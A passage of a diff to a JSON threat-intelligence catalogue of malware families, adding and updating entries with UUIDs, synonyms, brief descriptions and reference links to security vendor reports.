"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + ], + "synonyms": [ + "SeaDuke", + "Seadask" + ], + "type": [] + }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy" + "value": "SEADADDY" }, { "description": "", @@ -15153,6 +27701,23 @@ "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", "value": "SeaSalt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat", + "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers", + "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html" + ], + "synonyms": [ + "1xxbot", + "ArechClient" + ], + "type": [] + }, + "uuid": "a7e3b468-399c-419c-87d5-4efcea8ec0cc", + "value": "SectopRAT" + }, { "description": "", "meta": { @@ -15160,7 +27725,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", - "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/" + "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [], "type": [] @@ -15173,11 +27739,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/" ], "synonyms": [ "azzy", @@ -15193,12 +27762,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", - "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", - "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", + "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", @@ -15220,7 +27794,38 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup", + "https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9789dfe8-d156-4f19-8177-25718dd14f1f", + "value": "seinup" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet", + "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b4b4e8c8-fc66-4618-ba35-75f21d7d6922", + "value": "Sekhmet Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [], "type": [] @@ -15228,6 +27833,35 @@ "uuid": "503ca41c-7788-477c-869b-ac530f20c490", "value": "SendSafe" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys", + "https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html" + ], + "synonyms": [ + "Silvertor Ransomware" + ], + "type": [] + }, + "uuid": "08f37434-4aba-439f-afae-fed61f411ac4", + "value": "SepSys Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher", + "https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic", + "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6025475a-b89d-401d-882d-50fe1b03154f", + "value": "Sepulcher" + }, { "description": "", "meta": { @@ -15245,11 +27879,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", - "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", + "https://insights.oem.avira.com/ta505-apt-group-targets-americas/", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", - "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", - "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", + "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", + "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -15262,13 +27909,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", - "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", - "https://securelist.com/operation-shadowhammer/89992/", + "https://mauronz.github.io/shadowhammer-backdoor", + "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/", + "https://www.youtube.com/watch?v=T5wPwvLrBYU", + "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows", + "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/", + "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/", "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", - "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html" + "https://securelist.com/operation-shadowhammer/89992/", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/" + ], + "synonyms": [ + "DAYJOB" ], - "synonyms": [], "type": [] }, "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb", @@ -15280,10 +27939,26 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://www.youtube.com/watch?v=55kaaMGBARM", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/" ], "synonyms": [ + "POISONPLUG.SHADOW", "XShellGhost" ], "type": [] @@ -15349,6 +28024,32 @@ "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", "value": "SHARPKNOT" }, + { + "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" + ], + "synonyms": [], + "type": [] + }, + "uuid": "11788d9b-485b-4049-ba5e-1b06d526361e", + "value": "SharpStage" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats", + "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "819fd946-ed0e-4cec-ad45-66b88e39b732", + "value": "SHARPSTATS" + }, { "description": "", "meta": { @@ -15363,11 +28064,15 @@ "value": "ShellLocker" }, { - "description": "", + "description": "Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", + "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] @@ -15380,7 +28085,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-walker" ], "synonyms": [], "type": [] @@ -15406,7 +28112,6 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", - "http://www.nyxbone.com/malware/chineseRansom.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" ], "synonyms": [], @@ -15436,6 +28141,7 @@ "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" @@ -15453,21 +28159,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", + "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", + "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/", + "https://www.secrss.com/articles/26507", + "https://s.tencent.com/research/report/659.html", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" ], "synonyms": [], "type": [] }, - "related": [ - { - "dest-uuid": "c4ce1174-9462-47e9-8038-794f40a184b3", - "tags": [ - "estimative-language:likelihood-probability=\"likely\"" - ], - "type": "similar" - } - ], "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", "value": "SideWinder" }, @@ -15476,8 +28178,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/ncas/alerts/TA14-353A", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" ], "synonyms": [ "Destover" @@ -15499,15 +28206,36 @@ "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", "value": "Siggen6" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost", + "https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1b6e597-17e6-4485-819e-5aa03904bc61", + "value": "sihost" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", + "https://github.com/Tera0017/TAFOF-Unpacker", "http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html", + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://securelist.com/the-silence/83009/", - "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", + "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TrueBot" @@ -15548,7 +28276,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", - "https://secrary.com/ReversingMalware/iBank/" + "https://www.youtube.com/watch?v=u2HEGDzd8KM", + "https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/", + "https://secrary.com/ReversingMalware/iBank/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/" ], "synonyms": [ "iBank" @@ -15558,14 +28290,31 @@ "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", "value": "Simda" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b56173a1-84e3-4551-ac4a-9e71e65dc9e5", + "value": "SimpleFileMover" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://en.wikipedia.org/wiki/Torpig", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.recordedfuture.com/turla-apt-infrastructure/", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://en.wikipedia.org/wiki/Torpig", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/" ], "synonyms": [ @@ -15586,6 +28335,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" ], "synonyms": [], @@ -15598,14 +28348,50 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", - "http://malware-traffic-analysis.net/2017/11/23/index.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "http://atm.cybercrime-tracker.net/index.php", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] }, - "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom" + "uuid": "6d5e558a-e640-49c3-87b9-2c102c334b1b", + "value": "Skimer" + }, + { + "description": "A Microsoft SQL Server backdoor", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20", + "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6a59a639-8070-4c5f-86be-8a2a081cf487", + "value": "skip-2.0" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper", + "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/", + "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fac6313b-8068-429c-93ae-21e8072cf667", + "value": "Skipper" }, { "description": "", @@ -15632,6 +28418,20 @@ "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", "value": "Slave" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045b" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a82f80fc-71e8-4dee-8a64-e5cbb4100321", + "value": "SLICKSHOES" + }, { "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { @@ -15647,12 +28447,45 @@ "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver", + "https://github.com/BishopFox/sliver" + ], + "synonyms": [], + "type": [] + }, + "uuid": "654c478e-3c9a-4fd9-a9b7-dd6839f51147", + "value": "Sliver" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + ], + "synonyms": [ + "QueenOfClubs" + ], + "type": [] + }, + "uuid": "f23d70bc-7de6-49bd-bb69-82518b4d7fca", + "value": "SlothfulMedia" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" ], "synonyms": [], "type": [] @@ -15665,7 +28498,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "speccom" @@ -15675,26 +28509,100 @@ "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager", + "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", + "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html", + "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214", + "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", + "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", + "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/" + ], + "synonyms": [ + "PhantomNet" + ], + "type": [] + }, + "uuid": "1a6a6e4c-3e0e-422b-9840-9c6286dc7b17", + "value": "SManager" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes", + "https://www.virustotal.com/gui/file/4eb840617883bf6ed7366242ffee811ad5ea3d5bfd2a589a96d6ee9530690d28/details" + ], + "synonyms": [], + "type": [] + }, + "uuid": "67723f6e-822b-475a-938b-c9114b9aefea", + "value": "SmartEyes" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug", + "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service", + "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b81cbf03-8909-4833-badf-4df32c9bf6cb", + "value": "SMAUG Ransomware" + }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - 